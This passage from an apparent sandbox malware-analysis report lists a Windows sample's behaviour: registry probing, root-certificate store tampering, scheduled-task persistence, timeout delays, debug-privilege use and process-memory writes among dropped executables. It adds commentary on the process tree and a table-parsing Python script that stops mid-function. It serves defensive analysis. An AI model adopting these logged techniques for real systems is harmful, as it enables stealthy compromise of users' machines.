Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob omitted] C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob omitted] C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob omitted] C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\ProgramData\rwhkbvh\apitlt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1756 wrote to memory of 2944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
PID 1756 wrote to memory of 2944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
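The WriteProcessMemory table above is the clearest record of the process tree in this report: the sandbox logs four writes for each ordinary spawn (CreateProcess writes the child's startup data), so most edges are just parent-to-child relationships. Two things stand out when the rows are collapsed. First, skotes.exe is a byte-identical copy of the sample (same SHA256 in the Files section), so the first edge is the sample relaunching itself from its install directory. Second, PID 1740 writes ten times into PID 2820, and both ends are KsqTMuf.exe; that same-image, above-baseline pattern is what self-injection into a second instance looks like, and the WerFault -p 1740 row that follows is the injecting instance crashing. Also note that PID 2776 appears under two image names (chrome.exe as a target, mshta.exe as a source); the script keeps both labels rather than guessing which is right. The following Python is an added example written for this page, not sandbox output or code from the report; it embeds an excerpt of the table (eight of the fifteen distinct edges, with their repeat counts), and the baseline of four writes per spawn is taken from this run, not a general constant.

```python
import re
from collections import Counter, defaultdict
from ntpath import basename  # Windows path handling regardless of the host OS

# Constructed excerpt of the WriteProcessMemory table above: each distinct row
# written once with the number of times the sandbox repeated it.
SAMPLE_ROWS = [
    (r"PID 2520 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe", 4),
    (r"PID 2716 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe", 4),
    (r"PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe", 10),
    (r"PID 1740 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe", 4),
    (r"PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe", 4),
    (r"PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe", 4),
    (r"PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 4),
    (r"PID 1756 wrote to memory of 2944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE", 2),
]

# Source image is the shortest run that lets the target start with "C:\", which
# copes with the space in "C:\Program Files\...".
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) (C:\\.+)$")


def expand(rows):
    """Re-create the raw repeated lines exactly as the report prints them."""
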